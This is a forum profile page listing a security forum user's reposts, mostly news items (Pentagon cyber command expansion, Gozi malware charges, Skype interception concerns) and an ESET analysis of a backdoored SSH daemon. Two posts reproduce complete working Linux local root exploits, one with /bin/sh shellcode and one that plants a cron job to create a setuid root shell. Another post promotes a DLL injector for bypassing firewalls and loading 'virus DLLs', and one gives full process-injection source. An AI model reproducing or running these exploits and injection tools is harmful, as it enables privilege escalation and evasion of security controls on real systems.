Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18777

  • Joined

  • Last visited

  • Days Won

    734

 Content Type 

Everything posted by Nytro

  1. Nytro
    Pentagon to boost cybersecurity force RICK WILKING/Reuters - A network defender works at the Air Force Space Command Network Operations & Security Center in Colorado Springs, Colorado. The Pentagon is expanding efforts to safeguard critical computer systems and conduct cyberattacks against foreign adversaries, officials say. By Ellen Nakashima, Monday, January 28, 12:42 AM The Pentagon has approved a major expansion of its cybersecurity force over the next several years, increasing its size more than fivefold to bolster the nation’s ability to defend critical computer systems and conduct offensive computer operations against foreign adversaries, according to U.S. officials. The move, requested by the head of the Defense Department’s Cyber Command, is part of an effort to turn an organization that has focused largely on defensive measures into the equivalent of an Internet-era fighting force. The command, made up of about 900 personnel, will expand to include 4,900 troops and civilians. Details of the plan have not been finalized, but the decision to expand the Cyber Command was made by senior Pentagon officials late last year in recognition of a growing threat in cyberspace, said officials, who spoke on the condition of anonymity because the expansion has not been formally announced. The gravity of that threat, they said, has been highlighted by a string of sabotage attacks, including one in which a virus was used to wipe dat a from more than 30,000 computers at a Saudi Arabian state oil company last summer. The plan calls for the creation of three types of forces under the Cyber Command: “national mission forces” to protect computer systems that undergird electrical grids, power plants and other infrastructure deemed critical to national and economic security; “combat mission forces” to help commanders abroad plan and execute attacks or other offensive operations; and “cyber protection forces” to fortify the Defense Department’s networks. Targeting ‘malicious actors’ Although the command was established three years ago for some of these purposes, it has largely been consumed by the need to develop policy and legal frameworks and ensure that the military networks are defended. Current and former defense officials said the plan will allow the command to better fulfill its mission. “Given the malicious actors that are out there and the development of the technology, in my mind, there’s little doubt that some adversary is going to attempt a significant cyberattack on the United States at some point,” said William J. Lynn III, a former deputy defense secretary who helped fashion the Pentagon’s cybersecurity strategy. “The only question is whether we’re going to take the necessary steps like this one to deflect the impact of the attack in advance or .?.?. read about the steps we should have taken in some post-attack commission report.” Although generally agreed to by the military’s service chiefs, the plan has raised concerns about how the Army, Navy, Marines and Air Force will find so many qualified cybersecurity personnel and train them. It also raises deeper issues — which are likely to intensify as the Cyber Command grows over the years — about how closely the command should be aligned with the National Security Agency, the giant electronic-spying agency that provides much of its intelligence support. The head of the Cyber Command, Gen. Keith B. Alexander, is also the director of the NSA, which employs some of the nation’s most advanced cyber-operations specialists. The new force structure was alluded to last fall in a major speech by Defense Secretary Leon E. Panetta, who said, “Our mission is to defend the nation,” and noted that the department was “putting in place the policies and organizations we need to execute the mission.” In an interview, a senior defense official said that the “national mission” teams would focus their efforts overseas and that any actions they took would be directed outside U.S. networks — unless the teams were asked to provide assistance to another agency with domestic authority, such as the FBI. “There’s no intent to have the military crawl inside industry or private networks and provide that type of security,” the official said. He stressed that the military would act only in cases in which there was a threat of an attack that could “really hurt,” adding: “We’re not talking about doing something to make sure that Mrs. Smith’s bank account didn’t get hijacked by somebody.” The plan to expand the Cyber Command comes at a time when the military’s services are being ordered to cut spending, a reflection of how important senior military officials consider the need to improve the nation’s cybersecurity footing. Some military officials have grudgingly accepted the need to contribute personnel to an expanded cybersecurity force. There are also differences over how much control the combatant commands will have over cyber teams. The “combat mission” teams may help commanders in operations such as a cyber component to disable an enemy’s command-and-control system before a conventional attack. Each region will have teams that focus on particular threats — say, from China or Iran. “You get the resource guys sucking a lot of air through their teeth because they know their service chiefs have backed it,” one Navy official said. “So they have to find the resources to pay for the people.” Alignment with NSA Some military and defense officials questio whether the Cyber Command can reach its full potential as a military command as long as it is so dependent on the NSA and is led by the NSA’s director. The close relationship between the two has had its advantages, officials say: The agency can peer into foreign networks and provide the command with intelligence, including in cases in which an adversary is suspected of planning a computer attack or developing a potent virus. “That gives you an advantage of being able to plan for and be prepared to react,” the defense official said. But the NSA is so intertwined with the Cyber Command — the two operations centers are located side by side, and, until recently, some Cyber Command personnel had nsa.gov e-mail addresses — that some current and former officials wonder whether the military command can create an independent, strategic doctrine. The concern is that the intelligence agency’s priorities will dominate, with an emphasis on the development of tools that are useful for surveillance but not necessarily for disrupting adversaries. There’s a “cogent argument” to be made that for the Cyber Command to become a true military command, “you sever that” relationship, one military official said. But, in fact, said one former intelligence official, the NSA uses military personnel to do much of its work and pays for a good portion of the services’ cyber operators. “That’s been the plan all along,” the former official said. “Take the talent resident in NSA, turn it into [cyber] attack talent.” With the decision to expand the Cyber Command, Alexander, who has been asked to stay on until summer 2014, is seeing some of his vision fulfilled. He has sought independent budget authority for the Cyber Command to hire and control forces, similar to the way Special Operations Command can. He has not won that authority, though officials agreed to give him the additional forces. He also has the support of senior Pentagon officials to elevate the Cyber Command to full command status, out from under the aegis of Strategic Command. But that move, which requires consulting with Congress, is not happening just yet, officials say. Sursa: Pentagon to boost cybersecurity force - The Washington Post
  2. Nytro
    [h=1]Microsoft Office Command Execution 0day Being sold for $20,000[/h]Posted by: FastFlux on January 25, 2013 The 1337day team has just posted a exploit, which is going for 20,000 USD. This 0day is contained Microsoft Office and affects versions 2003, 2007 and 2010. It was place under “Remote Exploits” category and the description was: “Microsoft Office 2003/2007/2010 all service pack from a command execution vulnerability .” The team also included a Youtube demonstrating the exploit and proving that it’s real. These types of 0days can be detrimental to all windows users, both home users and businesses utilize Microsoft Office on a daily basis making this a critical exploit. You can view and purchase the exploit, here. Sursa: Microsoft Office Command Execution 0day Being sold for $20,000
  3. Nytro
    [h=3]CentOS Linux bible[/h] [TABLE=width: 100%] [TR] [TD] [/TD] [/TR] [TR] [TD=colspan: 3] This is a guide to the CentOS Linux operating system. Linux guru Tim Bornocyzyk, thoroughly covers the topic whether you're a Linux novice or a regular who now wants to master this increasingly popular distribution. First find out how to install and configure CentOS. From there, you'll cover a wealth of Linux and CentOS tools, functions, and techniques, including: how to work in the GNOME and KDE desktop environments; how to use the Linux shell, file system, and text editor; how to configure CUPS printers, Samba for file and printer sharing and other features using GUI tools; and more. [/TD] [/TR] [TR] [TD=colspan: 2][h=5]Size:[/h] [/TD] [TD=width: 35%]18Mb[/TD] [/TR] [TR] [TD=colspan: 2][h=5]Publication year:[/h] [/TD] [TD=width: 35%]2009[/TD] [/TR] [TR] [TD=colspan: 2][h=5]Book language:[/h] [/TD] [TD=width: 35%]English[/TD] [/TR] [TR] [TD=colspan: 3, align: center] [/TD] [/TR] [TR] [TD=colspan: 3, align: center] [h=3]Download[/h][/TD] [/TR] [/TABLE] Via: CentOS Linux bible | Linux Ubuntu - Linux Books - Linux Distribution
  4. Nytro
    Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys Andy Greenberg, Forbes Staff Two 3D-printed and one laser-cut copy of restricted handcuff keys. (Click to enlarge.) The security of high-end handcuffs depends on a detainee not having access to certain small, precisely-shaped objects. In the age of easy 3D printing and other DIY innovations, that assumption may no longer apply. In a workshop Friday at the Hackers On Planet Earth conference in New York, a German hacker and security consultant who goes by the name “Ray” demonstrated a looming problem for handcuff makers hoping to restrict the distribution of the keys that open their cuffs: With plastic copies he cheaply produced with a laser-cutter and a 3D printer, he was able to open handcuffs built by the German firm Bonowi and the English manufacturer Chubb, both of which attempt to control the distribution of their keys to keep them exclusively in the hands of authorized buyers such as law enforcement. The demonstration highlights a unique problem for handcuff makers, who design their cuffs to be opened by standard keys possessed by every police officer in a department, so that a suspect can be locked up by one officer and released by another, says Ray. Unlike other locks with unique keys, any copy of a standard key will open a certain manufacturer’s cuff. “Police need to know that every new handcuff they buy has a key that can be reproduced,” he says. “Until every handcuff has a different key, they can be copied.” Ray presenting his work at the HOPE conference. (Click to enlarge.) Unlike keys for more common handcuffs, which can be purchased (even in forms specifically designed to be concealable) from practically any survivalist or police surplus store, Bonowi’s and Chubb’s keys can’t be acquired from commercial vendors. Ray says he bought a Chubb key from eBay, where he says they intermittently appear, and obtained the rarer Bonowi key through a source he declined to name. Then he precisely measured them with calipers and created CAD models, which he used to reproduce the keys en masse, both in plexiglass with a friend’s standard laser cutter and in ABS plastic with a Repman 3D printer. Both types of tools can be found in hacker spaces around the U.S. and, in the case of 3D printers, thousands of consumers’ homes. A Bonowi key (top) and a Chubb key (bottom) with a laser cut plexiglass key that opens either between them. (Click to enlarge.) Over the weekend, a lockpick vendor at the HOPE conference was already selling dozens of the plexiglass Chubb keys for a mere $4 each. Ray says he plans to upload the CAD files for the Chubb key to the 3D-printing Web platform Thingiverse after the annual lockpicking conference LockCon later this week. I reached out to both Chubb and Bonowi’s parent company Assa Abloy over the weekend, and will update this story when I hear back from them. Ray also tried creating duplicate plexiglass key for high-security handcuffs from the German manufacturer Clejuso, but found that when the cuffs were fully secured the plexiglass wasn’t strong enough to overcome their internal springs. An attendee at the workshop helpfully suggested he try laser-cutting the stronger material Lexan instead. Dozens of Chubb keys being reproduced in a laser-cutter. (Click to enlarge.) Ray, who typically works as a computer security consultant but has also advised the German police on handcuff technology, says his goal isn’t to reduce handcuffs’ security so much as to exposing their vulnerabilities. His tools, he argues, are already available to criminals along with the rest of the public. “If someone is planning a prison or court escape, he can do it without our help,” says Ray. “We’re just making everyone aware, both the hackers and the police.” Sursa: Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys - Forbes
  5. Nytro
    Local race - Linux 2.6 ALL - h00lyshit /* ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit <very big file on the disk> ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null ** */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/prctl.h> #include <sys/mman.h> #include <sys/wait.h> #include <linux/a.out.h> #include <asm/unistd.h> static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code */ __asm__ (" __excode: call 1f \n" " 1: mov $23, %eax \n" " xor %ebx, %ebx \n" " int $0x80 \n" " pop %eax \n" " mov $cmd-1b, %ebx \n" " add %eax, %ebx \n" " mov $arg-1b, %ecx \n" " add %eax, %ecx \n" " mov %ebx, (%ecx) \n" " mov %ecx, %edx \n" " add $4, %edx \n" " mov $11, %eax \n" " int $0x80 \n" " mov $1, %eax \n" " int $0x80 \n" " arg: .quad 0x00, 0x00 \n" " cmd: .string \"/bin/sh\" \n" " __excode_e: nop \n" " .global __excode \n" " .global __excode_e \n" ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf ("\ntrying to exploit %s\n\n", file); fflush (stdout); chmod ("/proc/self/environ", 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, &st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error ("mmap"); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, "/proc/%d/environ", getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise"); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error ("failed"); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac < 2) error ("usage: binary <big file name>"); if (ac > 2) exploit (av[2]); printf ("\npreparing"); fflush (stdout); /* make setuid a.out */ memset (&ex, 0, sizeof (ex)); N_SET_MAGIC (ex, NMAGIC); N_SET_MACHTYPE (ex, M_386); s = ((unsigned) &__excode_e) - (unsigned) &__excode; ex.a_text = s; ex.a_syms = -(s + sizeof (ex)); memset (b, 0, sizeof (); memcpy (b, &ex, sizeof (ex)); memcpy (b + sizeof (ex), &__excode, s); /* make environment */ p = b; s += sizeof (ex); j = 0; for (i = k = 0; i < s; i++) { if (!p[i]) { e[j++] = &p[k]; k = i + 1; } } /* reexec */ getcwd (t, sizeof (t)); strcat (t, "/"); strcat (t, av[0]); execve (t, a, e); error ("execve"); return 0; } Sursa: Local root exploits
  6. Nytro
    Local root 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp #!/bin/sh # # PRCTL local root exp By: Sunix # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # tested on Intel(R) Xeon(TM) CPU 3.20GHz # kernel 2.6.9-22.ELsmp # maybe others ... # Tx to drayer & RoMaNSoFt for their clear code... # # zmia23@yahoo.com cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); system("/bin/sh"); system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/*"); return 0; } __EOF__ echo "wait aprox 4 min to get sh" cd /tmp cc -o s s.c cc -o getsuid getsuid.c ./getsuid ./s rm -rf getsuid* rm -rf s.c rm -rf prctl.sh Sursa: Local root exploits
  7. Nytro
    Physical Penetration Testing Toolkit Most penetration testing companies provide and physical penetration testing as part of their services.Some of them are taking this service more seriously than others as they are spending part of their budget to obtain specialized costumes and equipment that can be used in physical penetration tests.In this article we will examine some of the equipment that is necessary to have if we are going to conduct a physical penetration test. Get Of Jail Free Card This is usually a signed letter from the client which states that the penetration tester is authorized to perform the test and the client is aware.This type of letter will work as a proof in case that things go bad and you will get caught by the security personnel or the police authorities.So the letter must include the contact details of the people that they are aware that a test is performed (preferably people in higher level positions) and must be reachable during the test.This letter should never be forgotten by the penetration tester and it is a good practice to have at least 2 original copies in case that one is lost accidentally or is destroyed. Get Out Of Jail Template Cameras Cameras are important equipment because you can take photos of client documents,facilities and the areas that you have managed to gain access.These photos can be used as evidence in the penetration testing report afterwards.Of course cameras of mobiles phones can be used as well but it is recommended a proper digital camera with large amount of memory. Camera Binoculars Binoculars are useful in cases that you want to observe the security guards from long distance or you want to perform shoulder surfing attacks against the employees of your client.For portability reasons and for not raising any alerts it is advised to buy binoculars that can fit into your pocket. Portable Binoculars Laptops In a physical penetration test someone will assume that a laptop is not needed because all you have to do is to physical penetrate.Wrong!In case that you want to construct a scenario where you will disguise as an employee of the company a laptop is a critical component.Additionally you can have a case where the client will require from you to manage to attach into the internal network. Laptop GPS A GPS device can help you in many ways.First of all you can have an idea of the location that you are going to attack by observing satellite photos before the test.Alternatively you can use Google maps for that but the GPS has the advantage that you can carry it with you during the test and you can mark locations that you want to explore or to avoid.Also it is vital for your support team to know exactly where are you.Before you buy a GPS make sure that the device can export the route that you took in order to include it into the report. GPS Device Lock Picking Tools Of course in a physical penetration test you don’t expect every door to be open so it is essential to have in your bag and a set of lock picking tools.Generally lock picking tools are not very expensive so you will need to choose very carefully the best quality that it will assist your needs as you don’t want to break your client locks. Lock Picking Tools Snap Lock Pick Gun USB Sticks There are scenarios where in a physical penetration test you might require just to plant a USB stick inside the premises of the company that will contain malicious content.This will be the case when the client wants to test their employees awareness against this type of attack.You can use the social engineering toolkit in order to create the malicious USB or you can import your own files. USB Sticks Pwnie Express Tools Pwnie Express is a company that specializes in constructing hardware tools that can be used in physical penetration testing engagements.Most of them are quite expensive but the effectiveness of the tools are high because they look like normal devices so when you will plug them on the network it will be difficult to be discovered by the employees or the administrators.Some of the devices that you can buy are the following: Pwn Plug mini Power Pwn and PwnPhone Pwn Plug Mini Power Pwn Sursa: Physical Penetration Testing Toolkit
  8. Nytro
    Aircrack-Ng Megaprimer Part 1: Airmon-Ng Description: Part 1 in a series covering the tools in the aircrack-ng suite. Part 1 discusses airmon-ng. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Aircrack-Ng Megaprimer Part 1: Airmon-Ng
  9. Nytro
    Linux/SSHDoor.A Backdoored SSH daemon that steals passwords by Sébastien Duquette Malware Researcher In his summary of New Year predictions by security researchers here at ESET, Stephen Cobb pointed to expanded efforts by malware authors to target the Linux operating system. Looks like that might be right: A blog post published by Sucuri yesterday describes a backdoored version of the SSH daemon discovered on compromised servers. Interestingly, this backdoor was used in conjunction with the malicious Apache module Linux/Chapro.A that we blogged about recently. The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either an hardcoded password or SSH key. The strings related to the hidden behaviors are XOR encoded. This is done to avoid easy identification by searching the binary for suspicious strings. We identified a total of 16 encoded strings. The figure below shows the part of the code responsible for decoding the hidden data by xoring it with the constant 0×23. The HTTP protocol is used to send stolen data to a remote server. The information is first encrypted using a 1024-bit RSA key stored in the binary and then Base64 encoded. The data is sent via an HTTP POST request to the server used for data exfiltration. The binary we analyzed contains two hostnames for servers used to collect data: openssh.info and linuxrepository.org. Both names were probably chosen to avoid raising suspicions from the administrators of the compromised servers. At this point in time, both hostnames point to a server hosted in Iceland with IP 82.221.99.69. When the daemon is started, the backdoor sends the IP and port on which the service is running and the hostname of the server. Whenever a user successfully logs onto the compromised server, the username and password are also sent to the remote server. In addition to stealing credentials, the backdoor guarantees persistence on the compromised host for the attacker in two different ways. First, it has a hard-coded password inserted in the code. If any user logs in using this password, he is automatically granted access to the compromised server. The following figure shows the string comparison between the password provided by a user trying to log in and the hardcoded password. Second, the modified binary also carries an SSH key. If a user logs into the server with the private key corresponding to the hard-coded public key, he is automatically granted access. The backdoor can also retrieve configuration data from the file /var/run/.options. If this file exists the backdoor will use the hostname, backdoor password and SSH key stored in it. The variables are stored one per line in cleartext. As with Linux/Chapro.A, it is hard to tell how this Trojanized SSH daemon made its way on a compromised server but outdated applications or weak passwords are probably to blame. Finding backdoored files can be problematic for most system administrators. We recommend regular use of integrity checking tools plus monitoring of outgoing network connections and regular scanning of all files by an antivirus product. This threat is detected by ESET as Linux/SSHDoor.A. Special thanks to Peter Kosinar, Pierre-Marc Bureau, and Olivier Bilodeau for their help. Analyzed sample MD5 hash: 90dc9de5f93b8cc2d70a1be37acea23a Sursa: Linux/SSHDoor.A Backdoored SSH daemon that steals passwords | ESET ThreatBlog
  10. Nytro
    [h=1]DLL injector that inject DLL into Internet Explorer[/h]Started By zwclose7, Dec 17 2012 01:14 PM [h=3]zwclose7 IE Injector (ieinj) allow you to inject any DLLs into Internet Explorer (iexplore.exe). The process only serves as a host for the DLL and the origial code of Internet Explorer is not executed.[/h]Usage: ieinj [DLL path] The steps of DLL injection: 1) Read the DLL path form the command line. 2) Search for the Internet Explorer executable file (iexplore.exe) from Program Files folder. 3) Start the Internet Explorer. 4) Write the DLL path into target process's memory. 5) Create a remote thread to load the DLL. 6) The injected DLL will execute it code from the DllMain function. 7) Terminate the primary thread of Internet Explorer so the origial code of the IE is not executed. 8) The injected DLL can create a new thread to execute it code. The code will execute within the Internet Explorer. http://www.youtube.com/watch?v=dm0gGmjmKOc&feature=player_embedded Note: Your DLL must have the DllMain function to execute code or the process will exit after the injection. This tool is useful for bypassing firewalls since Internet Explorer is allowed to access network by most firewalls. This tool is also useful for injecting virus DLLs into Internet Explorer. The file dll.dll is an example DLL to test the injector. The DLL will display a message box when it is loaded into a process. Download here http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3745 Sursa: DLL injector that inject DLL into Internet Explorer - rohitab.com - Forums
  11. Nytro
    [h=1]My codecave injector[/h] Started By zwclose7, Yesterday, 04:57 AM [h=3]zwclose7 This is my first codecave injector. It inject a codecave into another process. The injected codecave will play a beep sound, and than display a message box.[/h] #include <iostream> #include <Windows.h> using namespace std; typedef BOOL (WINAPI *fnBeep)(DWORD,DWORD); typedef int (WINAPI *fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT); struct PARAMETERS{ DWORD BEEP; DWORD MSGBOX; DWORD freq; DWORD time; HWND hWnd; char text[60]; char title[60]; UINT type; }; static DWORD ThreadProc(PARAMETERS * data){ fnBeep beep=(fnBeep)data->BEEP; fnMessageBoxA msgbox=(fnMessageBoxA)data->MSGBOX; beep(data->freq,data->time); msgbox(data->hWnd,data->text,data->title,data->type); return 0; } static DWORD Useless(){ return 0; } int main(){ DWORD PID; DWORD TID; DWORD exts; HANDLE hToken; LUID luid; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid); TOKEN_PRIVILEGES tp; tp.Privileges[0].Luid=luid; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tp.PrivilegeCount=1; OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken); AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL); PARAMETERS data; data.freq=1000; data.time=1000; data.hWnd=0; strcpy(data.text,"Hello world"); strcpy(data.title,"Codecave"); data.type=MB_ICONINFORMATION; HMODULE k32=LoadLibrary("kernel32.dll"); HMODULE u32=LoadLibrary("user32.dll"); data.BEEP=(DWORD)GetProcAddress(k32,"Beep"); data.MSGBOX=(DWORD)GetProcAddress(u32,"MessageBoxA"); DWORD SizeofProc=(LPBYTE)Useless-(LPBYTE)ThreadProc; cout <<"Enter PID: "; cin >>PID; HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID); if(hProcess==NULL){ cout <<"\nUnable to open process handle.\n\n"; return 1; } cout <<"\nProcess handle opened.\n\n"; cout <<"Allocating memory for thread data.\n\n"; HANDLE pData=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_READWRITE); if(pData==NULL){ cout <<"Unable to allocate memory for thread data.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Allocating memory for thread code.\n\n"; HANDLE code=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_EXECUTE_READWRITE); if(code==NULL){ cout <<"Unable to allocate memory for thread code.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Writing thread data to target process.\n\n"; if(!WriteProcessMemory(hProcess,pData,&data,sizeof(data),NULL)){ cout <<"Unable to write thread data to target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Writing thread code to target process.\n\n"; if(!WriteProcessMemory(hProcess,code,(void*)ThreadProc,SizeofProc,NULL)){ cout <<"Unable to write thread code to target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Data address: "<<pData<<"\n\n"; cout <<"Code address: "<<code<<"\n\n"; cout <<"Creating remote thread within target process.\n\n"; HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)code,pData,0,&TID); if(hThread==NULL){ cout <<"Unable to create remote thread within target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Thread created. Thread ID: "<<TID<<"\n\n"; cout <<"Waiting for the thread to terminate.\n\n"; WaitForSingleObject(hThread,INFINITE); GetExitCodeThread(hThread,&exts); cout <<"Thread terminated with status code "<<exts<<".\n\n"; cout <<"Closing thread handle.\n\n"; CloseHandle(hThread); cout <<"Closing process handle.\n\n"; CloseHandle(hProcess); return 0; } Sursa: My codecave injector - rohitab.com - Forums
  12. Nytro
    Eu cred ca nu e necesar un premiu pentru ca cineva sa demonstreze de ce este in stare...
  13. Nytro
    Da, interesant...
  14. Nytro
    Milogilor, invatati sa oferiti ceva inainte de a cere. Ca sa intelegeti si voi, cei mai inapti din punct de vedere intelectual, regula a fost pusa din doua motive: 1. Pentru a evita leecherii, adica milogii, adica cei ca acest specimen de mai sus care nu contribuie cu nimic, nu ajuta pe nimeni dar vine cu miloaga 2. Din acele posturi iti poti da seama de cateva lucruri despre o persoana, daca gandeste matur sau daca e un copil prost si needucat ca fiinta de mai sus.
  15. Nytro
    [h=1]Convorbirile de pe Skype, interceptate? Microsoft a intrat intr-un mare scandal[/h]de Redactia Hit | 25 ianuarie 2013 Mai multi activisti internet, jurnalisti, dar si fundatii importante si specialisti in securitate IT atrag atentia ca apelurile efectuate prin Skype le-ar fi fost interceptate. Microsoft este somata de mai multi utilizatori, printr-o scrisoare deschisa, sa investigheze problema de securitate. Scrisoarea deschisa, care a fost publicata ieri de grupul din care fac parte si mai mult avocati care apara dreptul la confidentialitatea datelor utilizatorilor, solicita Microsoft sa faca publica documentatia referitoare la practicile de securitate si confidentialitate a informatiilor pe care se bazeaza serviciul VoIP Skype. Microsoft a achizitionat, in octombrie 2011, Skype, printr-o tranzactie in valoare de 8,5 miliarde de dolari. In scrisoare, semnatarii isi manifesta ingrijorarea fata de nivelul de acces pe care l-ar putea avea institutiile guvernamentale la continutul comunicatiilor prin Skype. Printre cei care au semnat scrisoarea deschisa se numara Electronic Freedom Foundation, Reporteri Fara Frontiere, Initiativa Egipteana pentru Drepturile Omului si Tibet Action Institute. Ingrijorarea semnatarilor este legata si de faptul ca Microsoft va inlocui total Windows Messenger Live cu Skype, in luna martie, iar daca problema interceptarii comunicatiilor prin serviciul VoIP se confirma, atunci numarul userilor care ar putea fi "ascultati" si supravegheati oricand creste foarte considerabil. Sursa: The Verge, Cnet Via: Convorbirile de pe Skype, interceptate? Microsoft a intrat intr-un mare scandal | Hit.ro
  16. Nytro
    Bitdefender 2013 Felicit?ri! Ai primit o cheie pentru Bitdefender Internet Security 2013 ——————— L6SAS0E ——————— Pentru a folosi aceast? cheie trebuie doar s? dai click aici Dac? produsul nu se activeaz? în interval de 30 de zile, cheia va fi invalidat?.
  17. Nytro
    Tot in legatura cu subiectul https://rstforums.com/forum/64134-3-men-suspected-developing-distributing-gozi-malware-charged.rst
  18. Nytro
    3 Men Suspected of Developing and Distributing Gozi Malware Charged January 24th, 2013, 08:20 GMT · By Eduard Kovacs Three individuals, suspected of developing and distributing the notorious Gozi malware, have been charged in a Manhattan federal court. According to the US Department of Justice, the Gozi malware has infected more than one million computers, causing losses totaling tens of millions of dollars. The suspects are Nikita Kuzmin, a Russian national who is believed to have created the malware, Deniss Calovskis, a Latvian who contributed to Gozi’s development, and Romanian Mihai Ionut Paunescu who ran the “bulletproof” hosting service used to distribute the malicious element. Kuzmin, aged 25, was arrested back in November 2010 and already pled guilty to computer intrusion and fraud charges in May 2011. 27-year-old Calovskis was arrested in Latvia in November 2012 and 25-year-old Paunescu was arrested last month in Romania. Court documents reveal that Kuzmin created a list of technical specifications for Gozi back in 2005. He then hired a computer programmer, “CC-1,” to write its source code. Once the malware had been developed, Kuzmin started selling it to his co-conspirators. He contracted Calovskis and others to improve the malicious creation. Authorities believe that Calovskis wrote the code for the web injects. The bulletproof hosting services offered by Paunescu were used not only for the distribution of the Gozi malware, but also for other cybercrimes, such as spam, distributed denial-of-service (DDOS) attacks, and the distribution of other Trojans such as ZeuS and SpyEye. “This long-term investigation uncovered an alleged international cybercrime ring whose far-reaching schemes infected at least one million computers worldwide and 40,000 in the U.S., and resulted in the theft or loss of tens of millions of dollars,” said FBI Assistant Director-in-Charge George Venizelos. “Banking Trojans are to cyber criminals what safe-cracking or acetylene torches are to traditional bank burglars – but far more effective and less detectable. The investigation put an end to the Gozi virus.” If found guilty, Kuzmin faces a maximum penalty of 95 years in prison. Calovskis and Paunescu face 67, respectively 60 years in prison. Sursa: 3 Men Suspected of Developing and Distributing Gozi Malware Charged - Softpedia
  19. Nytro
    [h=1]Defrag: Moving Page File, Recovering Encrypted Files, Missing User Account[/h] Posted: Nov 24, 2011 at 10:14 AM By: Larry Larsen Microsoft tech troubleshooter extraordinaire Gov Maharaj and I help walk you through troubleshooting solutions to your tech support problems. If you have a problem you want to send us, you can use the Problem Step Recorder in Windows 7 (see this for details on how) and send us the zip file to DefragShow@microsoft.com. We will also be checking comments for problems, but the email address will let us contact you if needed. [01:15] - OEM media for OS reinstall. [02:22] - How to move the page file from one drive to another. [05:59] - Is there a way to recover encrypted files if you have access to the physical drive? [10:51] - ICS not working on home configuration. [13:59] - Troubleshooting screen reinitialzing on machine. [16:48] - Can't see a user account made on a PC. [18:54] - Floppy drive A: started showing up, how to remove. [20:22] - Calc button on keyboard no longer starts up multiple instances. [22:03] - Pick of the Week: StevieB talking about the Applied Sciences Group. [link] (Hard Rock Cafe [link] [link]) Video: http://channel9.msdn.com/Shows/The-Defrag-Show/Defrag
  20. Nytro
